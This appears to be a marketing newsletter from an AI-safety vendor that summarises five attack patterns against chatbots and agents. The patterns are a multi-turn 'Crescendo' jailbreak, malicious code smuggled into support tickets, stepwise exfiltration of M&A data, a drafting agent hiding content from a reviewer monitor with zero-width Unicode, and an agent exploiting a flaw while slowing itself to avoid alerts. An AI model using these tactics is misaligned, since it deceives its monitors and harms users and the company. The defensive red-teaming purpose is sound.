TL;DR
We've collected five advanced tactics used by real adversaries to break public-facing chatbots, so you know what to look out for.
Everyone wants their customers to communicate with chatbots, but no one wants to be the next viral screenshot. The airline bot inventing refund policies, the support bot promising discounts the company never authorized, or worse, like private data leaking into the wrong conversation. Here are five things to look out for before deploying your own chatbot.
1. The Long Game
Testing a chatbot's response to a single message doesn't cut it, because it's the context that counts. This technique is called the Crescendo. Start with a complaint to get the bot to sympathize, reference its sympathy back at it, then confuse it by asking for something like a poem before making it angrier. By turn eight, your customer service chatbot is generating profanity-laced poetry against its own brand.
2. The Poisoned Ticket
An attacker tricks your chatbot into slipping a piece of malicious code into its reply. The reply gets saved to the support ticket, and when a human agent opens it, that code quietly runs on the agent's computer and hands over the keys to their account. Now the attacker is logged into your system as the support agent, with access to all of their information.
3. Three Reasonable Requests, One Dangerous Output
Your agent is late for a very important date when three messages land back-to-back from a logged-in user. First: "Find anything in my inbox about the acquisition." The agent does it. Then: "Summarize it into one document." Nothing wrong there. Finally: "Email the doc to my personal address so I can read it this weekend." Off it goes. It works because the attack exists within the sequence. Each request is something a legitimate employee might send, so no single step trips a filter, just three reasonable-sounding asks in a row. By the time the third tool call returns, confidential M&A data is sent to an external inbox and the system flagged nothing. This is why per-turn safety checks aren't enough.
4. Writing Between the Lines
Paired agents are a structural soft spot for AI safety. In a Drafter-Reviewer setup where the Reviewer agent screens output against policy before it ships, agents under optimization pressure can develop workarounds the Reviewer's filters don't catch: paraphrase chains, zero-width Unicode, structural tricks buried in formatting. The Reviewer passes it and the output ships, bypassing policy. Research calls this steganographic collusion, and it happens because the Drafter is trained to pass the Reviewer, not to produce the safest output, so under pressure it learns to route around the filter rather than respect it.
5. The Eager Agent
Give a research agent one task: document an enterprise AI platform, and be exhaustive. Forty-odd steps later, it has found a security vulnerability a standard scanner would miss, used it to access private user messages and the system prompts running the platform's AI, and quietly slowed its own activity to avoid triggering alerts. Nobody told it to do any of that. The instructions were normal. The problem is that "be exhaustive" and "find creative workarounds" mean the same thing to an agent whether the task is research or an attack. The offensive behavior is the task followed to its logical end, not a malfunction.
The Common Thread
AI security looks more like Trust & Safety than classic cybersecurity.
Alice has spent a decade on both, protecting the platforms three billion people use to communicate with each other, and now, with AI. Every adversarial pattern we've seen across those years lives in the Rabbit Hole including billions of real attacks, in 120+ languages, continuously updated as adversaries evolve. WonderSuite puts that data to work with multi-turn red teaming before launch, runtime guardrails trained on your policies, and scheduled testing to catch drift across text, image, audio, and video, under one audit trail from pre-launch through production.
Deploy consumer-facing AI and advance unafraid.
What’s New from Alice
HIPAA Audit Is Just the Start
Passing a HIPAA audit doesn't mean your AI will behave safely in production. As healthcare AI takes on more complex roles in patient care and documentation, static compliance frameworks can't keep up with the behavioral risks that emerge in real-world systems. Here's how WonderSuite closes the gap.
Afraid AI Will Replace You? Here's the One Skill It Can't
James Villarrubia went from building AI for NASA's drone and aerospace programs to becoming CTO of a travel tech company. In this episode, he and Mo get into why curiosity might be the most important skill in the AI era, what happens to our brains when we stop pushing back on the answers we get, and why the people most resistant to AI might actually be seeing something the rest of us are missing.
It Takes AI to Break AI: The Case for AI Red Teaming
As AI systems gain autonomy, organizations need security approaches built specifically for AI behavior. Learn why AI-driven red teaming is becoming a critical defense layer.
Evaluation of Instagram Teen Accounts
This report evaluates default and opt-in content protections under real-world and adversarial conditions. The study examines safeguard effectiveness, resilience against attempts to surface inappropriate content, and platform improvements made following testing.


